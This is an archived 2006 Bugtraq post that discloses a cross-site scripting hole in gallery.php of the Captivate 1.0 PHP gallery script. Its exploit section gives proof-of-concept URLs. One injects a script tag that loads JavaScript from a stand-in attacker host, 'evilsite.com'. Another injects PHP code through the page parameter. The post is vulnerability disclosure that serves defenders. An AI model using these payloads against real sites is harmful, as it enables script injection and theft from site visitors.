lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060521102032.10601.qmail@securityfocus.com> Date: 21 May 2006 10:20:32 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Captivate 1.0 - XSS Vuln Captivate 1.0 Homepage: http://new-place.org/scripts/ Description: A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images. Effected files: gallery.php Inproper filtering of action ?page= can lead to XSS. Exploit: One way to XSS would be renaming your JavaScript file to an image as an XSS vector: http://www.example.com/gallery.php?page=5<SCRIPT SRC=http://evilsite.com/xss.jpg></SCRIPT> Anoother one be: http://www.example.com/gallery.php?page=<?phpinfo();?> The current version of this script puts slashes in for ' and " but alot of other characters aren't filtered.